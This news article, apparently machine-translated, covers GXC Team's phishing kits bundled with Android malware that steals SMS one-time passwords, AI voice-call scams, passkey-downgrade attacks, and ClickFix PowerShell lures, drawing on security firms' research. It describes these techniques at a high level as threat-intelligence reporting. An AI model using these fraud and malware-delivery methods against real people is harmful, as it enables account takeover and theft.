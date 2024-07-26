A Spanish-speaking cybercriminal group called GXC Team has been observed while integrating phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to a new level.

GXC Team, how it behaves according to cybersecurity researchers

Singapore-based cybersecurity firm Group-IB, which has been monitoring GXC Team since January 2023, described the crimeware solution as a “sophisticated AI-powered phishing-as-a-service platform” capable of affecting users of over 36 Spanish banks, government agencies and 30 institutions worldwide.

GXC Team’s phishing kit ranges in price from $150 to $900 per month, while the package that includes the phishing kit and Android malware is available on a subscription basis for around $500 per month.

The campaign targets users of Spanish financial institutions, as well as tax and government services, e-commerce, banks and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia and Brazil. Up to 288 phishing domains have been identified so far in connection with the activity.

Part of the services offered also includes the sale of stolen banking credentials and custom coding schemes to other cybercriminal groups (such as the GXC Team) that target banks, financial institutions and cryptocurrency companies.

GXC Team are a bit of an atypical hacker

“Unlike typical phishing developers, GXC Team combined phishing kits with malware to steal OTP codes via SMS, tilting the typical phishing attack scenario in a slightly different direction“, they have declared security researchers Anton Ushakov and Martijn van den Berk in a report published Thursday.

What is remarkable here is that those behind GXC Team, instead of directly using a fake page to acquire credentials, incite victims to download an Android banking app to prevent phishing attacks; These pages are distributed through smishing and other methods.

Once installed, the GXC Team app requests permission to be configured as the default SMS app, making it possible to intercept one-time passwords and other messages and exfiltrate them to a Telegram bot under their control.

“In the final stage the app opens the authentic website of a bank in WebView allowing users to interact normally“, the researchers said. “After that, whenever the attacker triggers the OTP prompt, the Android malware silently receives and forwards SMS messages with OTP codes to the attacker-controlled Telegram chat..”

Among other services advertised by cybercriminals on a dedicated Telegram channel are AI-infused voice calling tools that allow their customers to generate voice calls to potential targets based on a series of prompts directly from the phishing kit.

These calls typically masquerade as coming from a bank, instructing users to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other arbitrary actions.

“Using this simple yet effective mechanism makes the scam scenario even more convincing for their victims and demonstrates how quickly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics.“, the researchers stressed.

In a recent report, Google-owned Mandiant revealed how AI-powered voice cloning has the ability to mimic human speech with “astonishing accuracy,” enabling more authentic phishing (or vishing) schemes that facilitate initial access, privilege escalation, and lateral movement.

“Cybercriminals can impersonate executives, colleagues, or even IT support staff to trick victims into revealing confidential information, granting remote access to systems, or transferring funds.“, has declared the threat intelligence company.

Google also added that: “lThe inherent trust associated with a familiar voice can be exploited to manipulate victims into taking actions they normally wouldn’t, such as clicking on malicious links, downloading malware, or disclosing sensitive data..”

GXC Team’s phishing kits, which also come with adversary-in-the-middle capabilities (AiTM), have become increasingly popular as they lower the technical barrier to running large-scale phishing campaigns.

Besides GXC Team, others also use similar systems

Cybersecurity researcher mr.d0x, in a relationship released last month, said it is possible for attackers to exploit progressive web apps (PWAs) to design convincing login pages for phishing purposes by manipulating user interface elements to display a fake URL bar.

Additionally, such AiTM phishing kits can be used to access accounts protected by password on various online platforms via an authentication method reduction attack, which exploits the fact that these services still offer a less secure authentication method as a fallback mechanism even when passkeys have been configured.

“Since the AiTM can manipulate the view presented to the user by modifying HTML, CSS, images or JavaScript in the login page, as it is proxy through to the end user, they can control the authentication flow and remove all references to passkey authentication.“, has said cybersecurity company eSentire.

The disclosure comes amid a recent increase in phishing campaigns that embed URLs already encoded using security tools like Secure Email Gateways (SEG) in an attempt to mask phishing links and avoid scanning, according to Barracuda Networks And Cofense.

Social engineering attacks have also been observed using unusual methods where users are tricked into visiting seemingly legitimate websites and then prompted to copy, paste and execute obfuscated code in a PowerShell terminal under the guise of fixing issues with the display of content in a web browser.

Details of the malware delivery method have been previously documented by ReliaQuest and Proofpoint. McAfee Labs is tracking the activity under the name ClickFix.

“By embedding Base64-encoded scripts into seemingly legitimate error prompts, attackers trick users into performing a series of actions that lead to the execution of malicious PowerShell commands.“, they have said researchers Yashvi Shah and Vignesh Dhatchanamoorthy who concluded that: “These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently distributing malware as DarkGate and Lumma Stealer.”